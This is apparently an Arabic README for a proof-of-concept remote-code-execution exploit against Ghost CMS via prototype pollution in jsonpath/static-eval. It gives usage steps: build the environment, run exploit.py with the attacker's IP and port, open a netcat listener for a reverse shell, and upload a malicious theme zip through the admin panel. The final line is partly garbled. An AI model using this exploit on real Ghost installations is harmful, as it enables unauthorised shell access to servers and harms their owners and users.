
إثبات مفهوم لاستغلال تنفيذ الأوامر عن بُعد في نظام Ghost CMS عبر تلويث النموذج الأولي في jsonpath وstatic-eval، مع إعداد بيئة قابلة للاستغلال وتعليمات الاستخدام.
ثغرة تنفيذ الأوامر عن بُعد (RCE) في Ghost CMS عبر سلسلة النماذج الأولية في jsonpath/static-eval.
cd build
./build.sh
python3 exploit.py -i <YOUR_IP> -p <PORT>
nc -lvnp <PORT>malicious-theme.zip إلى Ghost Admin ← Settings ← Designrce/rce/